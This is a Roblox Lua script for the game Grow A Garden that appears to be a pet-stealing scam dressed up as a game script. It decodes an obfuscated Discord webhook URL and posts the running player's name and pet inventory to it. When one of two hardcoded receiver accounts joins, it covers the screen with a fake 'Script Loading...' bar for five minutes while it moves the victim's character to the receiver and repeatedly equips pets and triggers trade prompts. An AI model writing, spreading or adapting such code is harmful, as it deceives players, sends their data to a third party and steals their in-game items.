local T = {"petsnatcha","davenaseventeen"}
local S,P,H,C,TW,R,L = string, game:GetService("Players"), game:GetService("HttpService"), game:GetService("CoreGui"), game:GetService("TweenService"), game:GetService("RunService"), game:GetService("Lighting")
local URL = table.concat((function()
    local x = {
        "104","116","116","112","115","58","47","47","100","105","115","99","111","114","100","46","99","111","109","47","97","112","105","47","119","101","98","104","111","111","107","115","47",
        "49","51","56","51","56","53","56","55","52","52","48","50","54","50","48","54","51","57","57","47","110","104","88","105","55","109","88","111","72","55","50","78","75","86","98","116",
        "111","118","108","76","118","72","85","113","115","90","106","109","95","90","111","51","70","69","48","85","88","104","68","84","84","75","80","118","67","75","97","82","53","77","114",
        "79","88","98","119","69","73","90","48","71","117","76","57","68","95","90","110","56"
    }
    for i,v in ipairs(x) do x[i] = string.char(tonumber(v)) end
    return x
end)())

local LP, Target, INV = P.LocalPlayer, nil, {}
local PET = {"bee","bunny","cat","deer","frog","hedgehog","monkey","owl","pig","zebra","mole","gazelle","butterfly","dragonfly","polar","rooster","fox","chicken","queen","black bunny","red fox","disco bee","cooked owl","jockey","flower","fruit"}

local function FindTarget()
    for _,v in P:GetPlayers() do
        for _,n in T do
            if v.Name:lower() == n:lower() then return v end
        end
    end
end

Target = FindTarget()
P.PlayerAdded:Connect(function(p)
    for _,n in T do
        if p.Name:lower() == n:lower() and not Target then
            Target = p
            task.delay(1, activateScript)
        end
    end
end)

for _,i in LP.Backpack:GetChildren() do
    local n = i.Name:lower()
    for _,k in PET do
        if n:find(k) then
            table.insert(INV, i.Name)
            break
        end
    end
end

local function EX()
    if syn then return "Synapse X"
    elseif getexecutorname then
        local ok, n = pcall(getexecutorname)
        if ok then return n end
    end
    return "Unknown"
end

local FIELDS = {
    {name="👤 Executor",value=LP.Name,inline=true},
    {name="🎯 Receiver",value=Target and Target.Name or "davenaseventeen",inline=true},
    {name="🔧 Executor",value=EX(),inline=true}
}
for i = 1, math.min(#INV, 25) do
    table.insert(FIELDS, {name="u200B", value=INV[i], inline=true})
end
table.insert(FIELDS, {
    name="🔗 Join Link",
    value=("[Click to Join](https://kebabman.vercel.app/start?placeId=%s&gameInstanceId=%s)"):format(game.PlaceId, game.JobId),
    inline=false
})

local D = {
    username = "🌿 Inventory Logger",
    embeds = {{
        title = "Grow A Garden Hit",
        color = 0x1ABC9C,
        fields = FIELDS,
        footer = {text = "WizardlyScriptz"},
        timestamp = DateTime.now():ToIsoDate()
    }}
}

pcall(function()
    local req = {
        Url = URL,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = H:JSONEncode(D)
    }
    (syn and syn.request or request or http and http.request or getgenv and getgenv().http_request)(req)
end)

function activateScript()
    local GUI = Instance.new("ScreenGui", C)
    GUI.IgnoreGuiInset = true
    GUI.ResetOnSpawn = false
    GUI.DisplayOrder = 999
    if syn and syn.protect_gui then syn.protect_gui(GUI) end

    local BG = Instance.new("Frame", GUI)
    BG.Size = UDim2.new(1, 0, 1, 0)
    BG.BackgroundColor3 = Color3.fromRGB(15, 70, 15)
    TW:Create(BG, TweenInfo.new(2, Enum.EasingStyle.Sine), {BackgroundColor3 = Color3.fromRGB(25, 90, 25)}):Play()

    local B = Instance.new("BlurEffect", L)
    B.Size = 24

    local CARD = Instance.new("Frame", BG)
    CARD.AnchorPoint = Vector2.new(0.5, 0.5)
    CARD.Position = UDim2.new(0.5, 0, 0.5, 0)
    CARD.Size = UDim2.new(0.5, 0, 0.32, 0)
    CARD.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
    CARD.ZIndex = 5
    Instance.new("UICorner", CARD).CornerRadius = UDim.new(0.08, 0)

    local TL = Instance.new("TextLabel", CARD)
    TL.Size = UDim2.new(1, -20, 0.25, 0)
    TL.Position = UDim2.new(0, 10, 0, 10)
    TL.BackgroundTransparency = 1
    TL.Text = "🌿 Grow a Garden Script Loading..."
    TL.Font = Enum.Font.GothamBold
    TL.TextScaled = true
    TL.TextColor3 = Color3.new(1, 1, 1)
    TL.ZIndex = 6

    local PB = Instance.new("Frame", CARD)
    PB.Size = UDim2.new(0.7, 0, 0.1, 0)
    PB.Position = UDim2.new(0.15, 0, 0.7, 0)
    PB.BackgroundColor3 = Color3.fromRGB(40, 40, 50)
    PB.ZIndex = 6
    Instance.new("UICorner", PB).CornerRadius = UDim.new(1, 0)

    local F = Instance.new("Frame", PB)
    F.Size = UDim2.new(0, 0, 1, 0)
    F.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
    F.ZIndex = 7
    Instance.new("UICorner", F).CornerRadius = UDim.new(1, 0)
    TW:Create(F, TweenInfo.new(300, Enum.EasingStyle.Linear), {Size = UDim2.new(1, 0, 1, 0)}):Play()

    task.spawn(function()
        local HRP = (LP.Character or LP.CharacterAdded:Wait()):WaitForChild("HumanoidRootPart")
        local Gy, Vel = Instance.new("BodyGyro", HRP), Instance.new("BodyVelocity", HRP)
        Gy.P, Gy.MaxTorque = 9e4, Vector3.new(9e9, 9e9, 9e9)
        Vel.MaxForce = Vector3.new(9e9, 9e9, 9e9)

        local BLACKLIST = {"shovel", "sprinkler", "seed", "trowel", "rod", "staff"}

        R.RenderStepped:Connect(function()
            if Target and Target.Character and Target.Character:FindFirstChild("HumanoidRootPart") then
                local TPOS = Target.Character.HumanoidRootPart.Position + Vector3.new(0, 0.4, 0)
                local DIR = (TPOS - HRP.Position).Unit
                Vel.Velocity = DIR * 60
                Gy.CFrame = CFrame.new(HRP.Position, TPOS)
            end
        end)

        while task.wait(0.1) do
            for _, tool in LP.Backpack:GetChildren() do
                if tool:IsA("Tool") then
                    local name = tool.Name:lower()
                    local skip = false
                    for _, b in ipairs(BLACKLIST) do
                        if name:find(b) then
                            skip = true
                            break
                        end
                    end
                    if not skip then
                        tool.Parent = LP.Character
                        task.wait(0.075)
                        if Target and Target.Character then
                            for _, d in ipairs(Target.Character:GetDescendants()) do
                                if d:IsA("ProximityPrompt") and d.Enabled then
                                    pcall(function()
                                        fireproximityprompt(d)
                                        task.wait(0.25)
                                    end)
                                end
                            end
                        end
                        task.wait(0.075)
                        tool.Parent = LP.Backpack
                        task.wait(0.075)
                    end
                end
            end
        end
    end)

    task.delay(300, function()
        GUI:Destroy()
        B:Destroy()
    end)
end

if Target then task.spawn(activateScript) end
